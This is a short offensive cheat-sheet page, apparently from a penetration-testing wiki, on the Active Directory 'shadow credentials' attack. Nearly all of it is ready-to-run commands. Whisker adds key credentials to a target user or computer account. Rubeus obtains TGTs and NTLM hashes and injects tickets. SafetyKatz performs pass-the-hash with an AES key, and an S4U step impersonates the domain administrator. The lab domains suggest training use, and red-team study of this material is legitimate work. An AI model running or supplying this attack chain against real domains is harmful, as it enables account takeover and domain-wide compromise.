shadow-credentials

Methodology

User with GenericAll/GenericWrite on msDS-KeyCredentialLink (Key Admins and Enterprise Key Admins have it by default).
Enumerate if the DC is atleast Windows 2016

Binaries

[!INFO] Remember to follow the Binaries methodology

Whisker

Add shadow credential:

Whisker.exe add /target:supportXuser

Check if shadow credential is added

Get-DomainUser -Identity supportXuser

Request the TGT by leveraging the certificate

# Retrieve NTLM hash
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap

# Pass the ticket
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.contoso.local /dc:US-DC.us.contoso.local /getcredentials /show /nowrap /ptt

Inject the TGT in the current session or use the NTLM hash:

Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...

Abusing Computer Object

Add the Shadow Credentials.

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:mgmtadmin /domain:us.techcorp.local /aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f /run:cmd.exe" "exit"
Whisker.exe add /target:us-helpdesk$

Using PowerView, see if the Shadow Credential is added.

Get-DomainComputer -Identity us-helpdesk

Request the TGT by using the certificate.

Rubeus.exe asktgt /user:us-helpdesk$ /certificate:MIIJ0AIBAzCCCYwGCSqGSIb... /password:"ViGFoZJa..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show

Request and Inject the TGS by impersonating the user.

Rubeus.exe s4u /dc:us-dc.us.techcorp.local /ticket:doIGkDCCBoygAwIBBaEDAgEW... /impersonateuser:administrator /ptt /self /altservice:cifs/us-helpdesk

Previousentra-id-phs-integration NextCross forest attacks

Last updated 1 month ago